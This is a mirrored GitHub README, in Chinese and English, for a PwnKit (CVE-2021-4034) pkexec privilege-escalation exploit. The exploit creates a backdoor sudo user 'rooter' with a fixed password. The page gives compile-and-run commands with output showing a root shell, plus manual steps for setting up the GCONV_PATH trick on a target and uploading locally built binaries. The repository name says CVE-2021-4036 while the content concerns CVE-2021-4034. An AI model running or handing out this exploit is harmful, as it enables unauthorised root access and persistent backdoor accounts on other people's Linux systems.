Git Product home page Git Product logo

cve-2021-4036's Introduction

CVE-2021-4034

CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码Hello@World,并且rooter用户将具有sudo权限。

Refer to CVE-2021-4034, executing Exploit will add username rooter, password Hello@World by default, and The rooter user will have sudo privileges.

Usage

test@some:~$ gcc cve-2021-4034.c -o ./exp
test@some:~$ ./exp
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...
test@some:~$ su rooter
Password:
root@some:/home/test# id
uid=0(root) gid=0(root) groups=0(root)
root@some:/home/test#

手动提权

如果目标环境没有gcc,可手动执行命令,并在本地编译pwnkit.so。

创建利用环境 - 目标机器

$ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
$ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules

编译pwnkit.so 与 pkexec - 本地

$ mkdir pwnkit
$ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
$ gcc pkexec.c -o pkexec

执行Exploit

  1. 将pwnkit文件夹上传到目标机器
  2. 将pkexec上传到目标机器
  3. 执行pkexec
$ ./pkexec
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...

cve-2021-4036's People

Contributors

rvn0xsy avatar

Stargazers

avatar

Forkers

jxpsx

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.